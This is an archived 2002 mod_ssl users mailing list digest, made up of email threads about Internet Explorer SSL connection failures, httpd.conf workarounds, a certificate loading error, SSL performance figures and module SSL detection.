modssl-users@modssl.org id g0VFIA430305; Thu, 31 Jan 2002 16:18:10 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id PAA20123; Thu, 31 Jan 2002 15:42:10 +0100 (MET) Date: Thu, 31 Jan 2002 15:42:10 +0100 (MET) Message-Id: <200201311442.PAA20123@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] IE Problems connecting to mod_ssl server Linux (PR#663) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Version: OS: Submission from: (NULL) (80.132.185.116) I'm having some very weird problems getting some IE clients to connect to a mod_ssl-enabled apache install, and I'm hoping someone has some insight on this beyond what's in the FAQ. The environment is as follows: Webserver version: [ Apache/1.3.20 (Linux/SuSE 7.3) PHP/4.0.6 mod_ssl/2.8.4 OpenSSL/0.9.6b ] I have a 128-bit selfmade cert installed. I have the complete FAQ fixes in (they were already there, actually) as far as an SSL session cache and the 56-bit export proto being turned off. Clients are Win2K ,Win98 with various patched IE 5.5 and Linux with Mozilla and Konqueror. In the case of IE, we have checked all protocols for SSL-Support. Here's a rough breakdown of what works and what doesn't: Linux / Mozilla /Konqueror: always works fine Win2K / IE 5.x: doen't work Win2K / NS 6.x: doen't work ("doesn't work" means that IE spits out that crappy "Cannot finds server or DNS error") I also added in the http.conf SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:!NULL But nothing works!! Please help me or i will hang me up soon. *s* ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 16:43:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA22756; Thu, 31 Jan 2002 16:42:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from plmler5.mail.eds.com id QAA22725; Thu, 31 Jan 2002 16:41:10 +0100 (MET) Received: from plmlir4.mail.eds.com (plmlir4-2.mail.eds.com [199.228.143.135]) by plmler5.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0VFf8025341 for ; Thu, 31 Jan 2002 09:41:08 -0600 Received: from plmlir4.mail.eds.com (localhost [127.0.0.1]) by plmlir4.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0VFf7j10239 for ; Thu, 31 Jan 2002 09:41:07 -0600 (CST) Received: from usplm002.exch.eds.com (USPLM002.txpln.us.eds.com [198.132.135.7]) by plmlir4.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0VFf6D10222 for ; Thu, 31 Jan 2002 09:41:06 -0600 (CST) Received: by USPLM002.txpln.us.eds.com with Internet Mail Service (5.5.2655.51) id ; Thu, 31 Jan 2002 10:41:08 -0500 Message-ID: <8A87A19E6153D4119FA800508BDF0932E0E2DE@USHEM202> From: "Kuczborski, Carol L" To: "'modssl-users@modssl.org'" Subject: RE: [BugDB] IE Problems connecting to mod_ssl server Linux (PR#66 3) Date: Thu, 31 Jan 2002 10:41:00 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.51) Content-Type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kuczborski, Carol L" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I reported this same issue in the Apache mod_ssl Bug DB over 6 months ago, but received no response. I eventually worked with Oracle Worldwide Support (which packages Apache and mod_ssl with it's Oracle9i Application Server) in regards to the errors. The "Cannot find server or DNS error" along with "Page cannot be displayed" errors were not completely eliminated, but greatly reduced. Everything worked fine with Netscape, but not IE. Here was our workable resolution: I did not completely eliminate the errors, but reduced them quite significantly by making the following changes: 1. Modified httpd.conf as follows (to remove the "nokeepalive" directive): SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown 2. Oracle Worldwide Support patched the ApacheModuleSSL.dll file. The patch to ApacheModuleSSL.dll implements a workaround in the code for reading from a socket for WIN32. According to the details for the ApacheModuleSSL.dll patch, there was mention of a bug in the "select" function in Windows NT 4.0: "When checking a socket, if data can be read without blocking, select () returns yes, but when actually reading from the socket with recv(), that function returns WSAEWOULDBLOCK, which says that reading would block. It seems that this problem does not occur in usual operation, but only in an SSL enabled Apache (modssl or apache-ssl) with https. The code for WIN32, which handles writing to a socket, already contains a workaround for this. The code for reading from a socket did not have a workaround." Basically, they added a retry loop so that if a read from the socket failed, it tried the read again. Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com -----Original Message----- From: modssl-bugdb@modssl.org [mailto:modssl-bugdb@modssl.org] Sent: Thursday, January 31, 2002 9:42 AM To: modssl-users@modssl.org Cc: modssl-bugdb@modssl.org Subject: [BugDB] IE Problems connecting to mod_ssl server Linux (PR#663) Full_Name: Version: OS: Submission from: (NULL) (80.132.185.116) I'm having some very weird problems getting some IE clients to connect to a mod_ssl-enabled apache install, and I'm hoping someone has some insight on this beyond what's in the FAQ. The environment is as follows: Webserver version: [ Apache/1.3.20 (Linux/SuSE 7.3) PHP/4.0.6 mod_ssl/2.8.4 OpenSSL/0.9.6b ] I have a 128-bit selfmade cert installed. I have the complete FAQ fixes in (they were already there, actually) as far as an SSL session cache and the 56-bit export proto being turned off. Clients are Win2K ,Win98 with various patched IE 5.5 and Linux with Mozilla and Konqueror. In the case of IE, we have checked all protocols for SSL-Support. Here's a rough breakdown of what works and what doesn't: Linux / Mozilla /Konqueror: always works fine Win2K / IE 5.x: doen't work Win2K / NS 6.x: doen't work ("doesn't work" means that IE spits out that crappy "Cannot finds server or DNS error") I also added in the http.conf SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:!NULL But nothing works!! Please help me or i will hang me up soon. *s* ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 16:55:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA23428; Thu, 31 Jan 2002 16:54:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id QAA23378; Thu, 31 Jan 2002 16:53:14 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id KAA00322; Thu, 31 Jan 2002 10:59:06 -0500 Date: Thu, 31 Jan 2002 10:59:06 -0500 (EST) From: "R. DuFresne" To: "Kuczborski, Carol L" cc: "'modssl-users@modssl.org'" Subject: RE: [BugDB] IE Problems connecting to mod_ssl server Linux (PR#66 3) In-Reply-To: <8A87A19E6153D4119FA800508BDF0932E0E2DE@USHEM202> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Carol, It was my understanding, and perhaps I've misread posts here, that the list here has long advocated this setting for IE issues: SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown Also, for mozilla problems it has often been advocated to set this in the httpd.conf: SetEnvIf User-Agent ".*Mozilla.*" nokeepalive There well maybe more current setting recomended, but, I have not had to deal with such issues and have paid them little heeed unless I faced problems specifically realted to list recomendations. Thanks, Ron DuFresne On Thu, 31 Jan 2002, Kuczborski, Carol L wrote: > I reported this same issue in the Apache mod_ssl Bug DB over 6 months ago, > but received no response. I eventually worked with Oracle Worldwide Support > (which packages Apache and mod_ssl with it's Oracle9i Application Server) in > regards to the errors. The "Cannot find server or DNS error" along with > "Page cannot be displayed" errors were not completely eliminated, but > greatly reduced. Everything worked fine with Netscape, but not IE. Here > was our workable resolution: > > I did not completely eliminate the errors, but reduced them quite > significantly by making the following changes: > > 1. Modified httpd.conf as follows (to remove the "nokeepalive" directive): > > SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown > > 2. Oracle Worldwide Support patched the ApacheModuleSSL.dll file. The patch > to ApacheModuleSSL.dll implements a workaround in the code for reading from > a socket for WIN32. According to the details for the ApacheModuleSSL.dll > patch, there was mention of a bug in the "select" function in Windows NT > 4.0: > > "When checking a socket, if data can be read without blocking, select () > returns yes, but when actually reading from the socket with recv(), that > function returns WSAEWOULDBLOCK, which says that reading would block. It > seems that this problem does not occur in usual operation, but only in an > SSL enabled Apache (modssl or apache-ssl) with https. The code for WIN32, > which handles writing to a socket, already contains a workaround for this. > The code for reading from a socket did not have a workaround." > > Basically, they added a retry loop so that if a read from the socket failed, > it tried the read again. > > Carol Kuczborski > EDS - Enabling Business Solutions > MS A6N-B47 > 13600 EDS Drive > Herndon, VA 20171 > > * phone: +01-703-742-1025 (8-432) > * mailto:carol.kuczborski@eds.com > www.eds.com > > > > -----Original Message----- > From: modssl-bugdb@modssl.org [mailto:modssl-bugdb@modssl.org] > Sent: Thursday, January 31, 2002 9:42 AM > To: modssl-users@modssl.org > Cc: modssl-bugdb@modssl.org > Subject: [BugDB] IE Problems connecting to mod_ssl server Linux (PR#663) > > > Full_Name: > Version: > OS: > Submission from: (NULL) (80.132.185.116) > > > I'm having some very weird problems getting some IE clients to connect to a > mod_ssl-enabled apache install, and I'm hoping someone has some insight on > this > beyond what's in the FAQ. The environment is as follows: > Webserver version: > [ Apache/1.3.20 (Linux/SuSE 7.3) PHP/4.0.6 mod_ssl/2.8.4 OpenSSL/0.9.6b ] > > I have a 128-bit selfmade cert installed. I have the complete FAQ fixes in > (they > were already there, actually) as far as an SSL session cache and the 56-bit > export proto being turned off. > > Clients are Win2K ,Win98 with various patched IE 5.5 and Linux with Mozilla > and > Konqueror. In the case of IE, we have checked all protocols for SSL-Support. > > Here's a rough breakdown of what > works and what doesn't: > > Linux / Mozilla /Konqueror: always works fine > Win2K / IE 5.x: doen't work > Win2K / NS 6.x: doen't work > ("doesn't work" means that IE spits out that crappy "Cannot finds server or > DNS > error") > > I also added in the http.conf > > SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown > downgrade-1.0 > force-response-1.0 > SSLCipherSuite > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:!NULL > > But nothing works!! > > Please help me or i will hang me up soon. *s* > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 17:18:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA24753; Thu, 31 Jan 2002 17:16:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id RAA24717; Thu, 31 Jan 2002 17:15:05 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 31 Jan 2002 08:15:02 -0800 Received: from 216.254.102.155 by lw11fd.law11.hotmail.msn.com with HTTP; Thu, 31 Jan 2002 16:15:02 GMT X-Originating-IP: [216.254.102.155] From: "Bab S" To: modssl-users@modssl.org Subject: test Date: Thu, 31 Jan 2002 16:15:02 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 31 Jan 2002 16:15:02.0747 (UTC) FILETIME=[7023C2B0:01C1AA72] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bab S" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users test _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 17:54:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA26428; Thu, 31 Jan 2002 17:53:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id RAA26370; Thu, 31 Jan 2002 17:52:06 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 31 Jan 2002 08:52:03 -0800 Received: from 216.254.102.155 by lw11fd.law11.hotmail.msn.com with HTTP; Thu, 31 Jan 2002 16:52:02 GMT X-Originating-IP: [216.254.102.155] From: "Bab S" To: modssl-users@modssl.org Subject: Httpd couldnot be started Date: Thu, 31 Jan 2002 16:52:02 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 31 Jan 2002 16:52:03.0052 (UTC) FILETIME=[9B8B6AC0:01C1AA77] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bab S" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I am currently trying to set up SSL on a LINUX box running Apache Web Server. When I run apachectl startssl, it says `httpd could not be started` here is what i get in the apache error_log after i do a apachectl startssl ****** [Wed Jan 30 16:54:48 2002] [notice] caught SIGTERM, shutting down [Wed Jan 30 16:54:51 2002] [error] mod_ssl: Init: Unable to read server certificate from file /usr/local/apache/conf/ssl.crt/server.crt [Wed Jan 3016:54:51 2002] [error] OpenSSL: error:0D09F007:asn1 encoding routines:d2i_X509:expecting an asn1 sequence ******* I am using port 443 for secure and port 80 for unsecure .I am doing for the first time so i dont know how can i resolve. I appreciate any help you can send over. Thanks _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 18:01:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA26746; Thu, 31 Jan 2002 18:00:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id RAA26665; Thu, 31 Jan 2002 17:59:14 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA00632; Thu, 31 Jan 2002 12:05:01 -0500 Date: Thu, 31 Jan 2002 12:05:01 -0500 (EST) From: "R. DuFresne" To: Bab S cc: modssl-users@modssl.org Subject: Re: Httpd couldnot be started In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Did you create a cert when you went through the compile process? Does your httpd.conf point at it properly? Thanks, Ron DuFresne On Thu, 31 Jan 2002, Bab S wrote: > > Hi > > I am currently trying to set up SSL on a LINUX box running Apache Web > Server. > > When I run apachectl startssl, it says `httpd could not be started` > > here is what i get in the apache error_log after i do a apachectl startssl > ****** > [Wed Jan 30 16:54:48 2002] [notice] caught SIGTERM, shutting down > [Wed Jan 30 16:54:51 2002] [error] mod_ssl: Init: Unable to read server > certificate from file > /usr/local/apache/conf/ssl.crt/server.crt > [Wed Jan 3016:54:51 2002] [error] OpenSSL: error:0D09F007:asn1 encoding > routines:d2i_X509:expecting an asn1 > sequence > ******* > > I am using port 443 for secure and port 80 for unsecure .I am doing for the > first time so i dont know how can i resolve. > > I appreciate any help you can send over. Thanks > > > > > > _________________________________________________________________ > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 18:47:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA00204; Thu, 31 Jan 2002 18:46:50 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id SAA00159; Thu, 31 Jan 2002 18:45:39 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 211FB4CE6E0; Thu, 31 Jan 2002 18:45:39 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0VHVHe33311; Thu, 31 Jan 2002 18:31:17 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.capgemini.nl id SAA27453; Thu, 31 Jan 2002 18:07:12 +0100 (MET) Received: from exchange_test.capgemini.nl (techneticum.capgemini.nl [194.229.163.69]) by mail.capgemini.nl (8.11.1/8.11.1) with ESMTP id g0VH7AE23572 for ; Thu, 31 Jan 2002 18:07:10 +0100 (MET) Received: by techneticum.capgemini.nl with Internet Mail Service (5.5.2653.19) id ; Thu, 31 Jan 2002 18:04:37 +0100 Received: from mail1.capgemini.nl (krypton.capgemini.nl [193.78.92.63]) by exchange_test.capgemini.nl with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id K7T40TAB; Thu, 31 Jan 2002 18:04:35 +0100 Received: from cgey.nl (nw710.capgemini.nl [10.32.35.92]) by mail1.capgemini.nl (8.10.1/8.10.1) with SMTP id g0VH78f05435 for ; Thu, 31 Jan 2002 18:07:08 +0100 (MET) Received: from DSMTP-Message_Server by cgey.nl with Novell_GroupWise; Thu, 31 Jan 2002 18:07:08 +0100 Message-ID: From: Lennert de Waal To: modssl-users@modssl.org Subject: Re: [BugDB] IE Problems connecting to mod_ssl server Linux (PR#66 3) Date: Thu, 31 Jan 2002 18:06:46 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lennert de Waal X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have searched and searched the past days, and have come across a new schannel.dll file (which resides in \windows\system for 9x and in \winnt\system32 for nt/win2k). It seems that the original installed with MSIE 4 and 5 is broken. When replacing the original with this file, the MSIE 'DNS-error-page'-problem was fixed. You could try this; don't know if it solves your problem. The MS website for the patch is (it's one URL): http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechn ol/ie/downloads/schannel.asp Lennert de Waal - the Netherlands <<< 1/31 3:42p >>> Full_Name: Version: OS: Submission from: (NULL) (80.132.185.116) I'm having some very weird problems getting some IE clients to connect to a mod_ssl-enabled apache install, and I'm hoping someone has some insight on this beyond what's in the FAQ. The environment is as follows: Webserver version: [ Apache/1.3.20 (Linux/SuSE 7.3) PHP/4.0.6 mod_ssl/2.8.4 OpenSSL/0.9.6b ] I have a 128-bit selfmade cert installed. I have the complete FAQ fixes in (they were already there, actually) as far as an SSL session cache and the 56-bit export proto being turned off. Clients are Win2K ,Win98 with various patched IE 5.5 and Linux with Mozilla and Konqueror. In the case of IE, we have checked all protocols for SSL-Support. Here's a rough breakdown of what works and what doesn't: Linux / Mozilla /Konqueror: always works fine Win2K / IE 5.x: doen't work Win2K / NS 6.x: doen't work ("doesn't work" means that IE spits out that crappy "Cannot finds server or DNS error") I also added in the http.conf SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 SSLCipherSuite ALL:!ADH:!EXPORT56:RC4 RSA: HIGH: MEDIUM: LOW: SSLv2: EXP:!NULL But nothing works!! Please help me or i will hang me up soon. *s* ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org -- **************************************************************************** This message contains information that may be privileged or confidential and is the property of the Cap Gemini Ernst & Young Group. It is only intended for the person to whom it is addressed. If you are not the intended recipient, you are not authorized to read, print, retain, copy disseminate, distribute, or use this message or any part thereof. If you receive this message in error, please notify the sender immediately and delete all copies of this message. **************************************************************************** ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 20:13:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA03848; Thu, 31 Jan 2002 20:12:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta03-svc.ntlworld.com id UAA03810; Thu, 31 Jan 2002 20:11:08 +0100 (MET) Received: from bigboy ([213.105.78.110]) by mta03-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP id <20020131191057.CCKG26285.mta03-svc.ntlworld.com@bigboy> for ; Thu, 31 Jan 2002 19:10:57 +0000 Message-ID: <004201c1aa8b$320a5ac0$0301a8c0@bigboy> From: "Andrew.Hazelton@ntlworld.com" To: Subject: up-to-date SSL performance figures wanted Date: Thu, 31 Jan 2002 19:12:15 -0000 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_003F_01C1AA8B.31CED860" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew.Hazelton@ntlworld.com" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_003F_01C1AA8B.31CED860 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Chaps, does anyone know where I can find up-to-date SSL performance figures for = mod_ssl running on Linux on IA servers, especially for Pentium4 & Xeon = processors. Most on the info I have found is a couple of years old now = and very dated. I particularly want stats on SSL connections per second figures for = dual- & quad- processor machines. Has anyone looked at uniprocessor 2GHz = or 2.2GHz Pentium 4 machines? =20 Anyone have a feel for what is 'state-of-the-art' SSL CPS performance = today? best regards Andy Hazelton=20 ------=_NextPart_000_003F_01C1AA8B.31CED860 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Chaps,
does anyone know where I can find = up-to-date SSL=20 performance figures for mod_ssl running on Linux on IA servers, = especially for=20 Pentium4 & Xeon processors.  Most on the info I have found = is a=20 couple of years old now and very dated.
 
I particularly want stats on SSL = connections per=20 second figures for dual- & quad- processor machines. Has anyone = looked at=20 uniprocessor 2GHz or 2.2GHz Pentium 4 machines?
 
Anyone have a feel for what is = 'state-of-the-art'=20 SSL CPS performance today?
 
best regards
Andy = Hazelton 
------=_NextPart_000_003F_01C1AA8B.31CED860-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 20:29:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA04520; Thu, 31 Jan 2002 20:27:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bubblehouse.divisionbyzero.com id UAA04489; Thu, 31 Jan 2002 20:26:32 +0100 (MET) Received: from devotchka.sonicopia.com (adsl-63-194-199-37.dsl.snfc21.pacbell.net [63.194.199.37]) by bubblehouse.divisionbyzero.com (Postfix) with ESMTP id 505E55BD86 for ; Thu, 31 Jan 2002 12:36:58 -0800 (PST) Subject: RE: [BugDB] IE Problems connecting to mod_ssl server Linux (PR#66 3) From: jon schatz To: modssl-users@modssl.org In-Reply-To: References: Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-K92TesmphcZ49zju2y8n" X-Mailer: Evolution/1.0.1 Date: 31 Jan 2002 11:27:00 -0800 Message-Id: <1012505221.29784.0.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-K92TesmphcZ49zju2y8n Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Thu, 2002-01-31 at 07:59, R. DuFresne wrote: > It was my understanding, and perhaps I've misread posts here, that the > list here has long advocated this setting for IE issues: >=20 > SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown except on current (apache 1.3.22) builds, this doesn't work (see my long thread about this here and on httpd-users). -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-K92TesmphcZ49zju2y8n Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8WZqEwj1gFegse14RAmDSAJ9ecXPk0PQhqOnlMidpQvQi4OZXagCfa4Io vL7MRvESiNp2+ihUh7I4oMM= =Tbzx -----END PGP SIGNATURE----- --=-K92TesmphcZ49zju2y8n-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 23:31:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA13159; Thu, 31 Jan 2002 23:30:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from conswfw01.con.securecomputing.com id XAA13146; Thu, 31 Jan 2002 23:30:03 +0100 (MET) Received: from conswfw01.con.securecomputing.com (root@localhost) by conswfw01.con.securecomputing.com with ESMTP id g0VMTvN06587 for ; Thu, 31 Jan 2002 14:29:57 -0800 (PST) Received: from conntmx01.con.securecomputing.com (conntmx01.con.securecomputing.com [192.168.24.14]) by conswfw01.con.securecomputing.com with ESMTP id g0VMTup06583 for ; Thu, 31 Jan 2002 14:29:56 -0800 (PST) Received: by conntmx01.con.securecomputing.com with Internet Mail Service (5.5.2650.21) id ; Thu, 31 Jan 2002 14:29:57 -0800 Message-ID: <61F0C65933ACD311ABCC00A0C9F1AD74C4F171@conntmx01.con.securecomputing.com> From: "Melnick, Jeff" To: "'modssl-users@modssl.org'" Subject: How a module can tell if a server is enabled to use SSL? Date: Thu, 31 Jan 2002 14:20:12 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1AAA5.7375A4A0" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Melnick, Jeff" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1AAA5.7375A4A0 Content-Type: text/plain; charset="iso-8859-1" Does anyone know how my module (written in C), can tell if a server is enabled to use SSL? There doesn't seem to be a direct way of doing it. Thanks for the help. ------_=_NextPart_001_01C1AAA5.7375A4A0 Content-Type: text/html; charset="iso-8859-1" How a module can tell if a server is enabled to use SSL?

Does anyone know how my module (written in C), can tell if a server is enabled to use SSL?
There doesn't seem to be a direct way of doing it.
Thanks for the help.

